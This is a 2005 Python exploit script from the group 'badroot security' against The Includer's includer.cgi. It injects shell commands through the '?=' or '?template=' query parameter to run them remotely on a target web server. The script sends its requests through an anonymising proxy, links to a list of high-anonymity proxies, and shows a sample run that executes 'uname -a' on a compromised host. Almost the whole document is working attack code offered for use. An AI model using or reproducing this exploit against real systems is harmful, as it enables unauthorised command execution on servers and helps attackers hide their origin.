[badroot security] includer.cgi remote commands execution vulnerability remote exploit. #!/usr/bin/python # The Includer remote commands execution exploit v. 2 # Exploit by: mozako - mozako[at]mybox[dot]it # Vuln. discovered by: Francisco Alisson # # (C) 2005 - badroot security # http://www.badroot.org # PRIVATE - FUNNY, WITH PROXY !!! # # mozako@ganja:~$ ./includer.py -h http://host-vuln.com/ -c uname -ar # =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # The Includer remote commands execution exploit # PRIVATE - FUNNY, WITH PROXY !!! # by: mozako # =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Type '1' for includer.cgi?=[] injection or '2' for includer.cgi?template=[] injection: 2 # [X] Connecting... # Type your proxy (IP:PORT) here: 148.244.150.58:80 # [X] Proxing... [OK] # [X] Sending exploit... [OK] # [X] Exploited ! # # Linux ipx10254 2.4.21-192-smp4G #1 SMP Wed Feb 18 19:27:48 UTC 2004 i686 i686 i386 GNU/Linux # # enjoy ! import sys import urllib import linecache __argv__ = sys.argv print """=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= The Includer remote commands execution exploit PRIVATE - FUNNY, WITH PROXY !!! by: mozako =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=""" def usage(): print """ The Includer remote commands execution exploit by: mozako 7.3.2005 Usage: $ ./phpN.py -h http://123.4.5.6/Includer_PATH/ -c COMMAND """ sys.exit(-1) if len(__argv__) < 4: usage() host = __argv__[2] if len(__argv__) > 4: __argv__=__argv__[4:] send="" for elem in __argv__[:-1]: send=send+elem+"%20" send = send + __argv__[-1] else: send == __argv__[4] def hack2(): print "[X] Connecting..." proxer = raw_input("Type your proxy (IP:PORT) here: ") proxy = {'http': 'http://' + proxer} # PROXY !!! (find here: http://www.aliveproxy.com/high-anonymity-proxy-list) print "[X] Proxing...", url = urllib.FancyURLopener(proxy) print "[OK]" print "[X] Sending exploit...", stack = url.open(host + "includer.cgi?template=|" + send + "|") read = stack.read() print "[OK]" print "[X] Exploited !\n" t_file = open('temp.txt', 'w') print >> t_file, read t_file = open('temp.txt', 'r') for line in linecache.getlines("temp.txt"): if(line[0:16]=="document.write('"): print line[16:-4] elif(line[0:18]=="document.writeln('"): print line[18:-4] elif(line[0]=="<"): pass elif(line[0:2]=="*/"): pass elif(line[0:2]=="/*"): pass else: print line[:-1] def hack(): print "[X] Connecting..." proxer = raw_input("Type your proxy (IP:PORT) here: ") proxy = {'http': 'http://' + proxer} # PROXY !!! (find here: http://www.aliveproxy.com/high-anonymity-proxy-list) print "[X] Proxing...", url = urllib.FancyURLopener(proxy) print "[OK]" print "[X] Sending exploit...", stack = url.open(host + "includer.cgi?=|" + send + "|") read = stack.read() print "[OK]" print "[X] Exploited !\n" t_file = open('temp.txt', 'w') print >> t_file, read t_file = open('temp.txt', 'r') for line in linecache.getlines("temp.txt"): if(line[0:16]=="document.write('"): print line[16:-4] elif(line[0:18]=="document.writeln('"): print line[18:-4] elif(line[0]=="<"): pass elif(line[0:2]=="*/"): pass elif(line[0:2]=="/*"): pass else: print line[:-1] choise = raw_input("Type '1' for includer.cgi?=[] injection or '2' for includer.cgi?template=[] injection: ") if choise == "1": hack() if choise == "2": hack2() # eof enjoy, mozako - mozako [at] mybox [dot] it
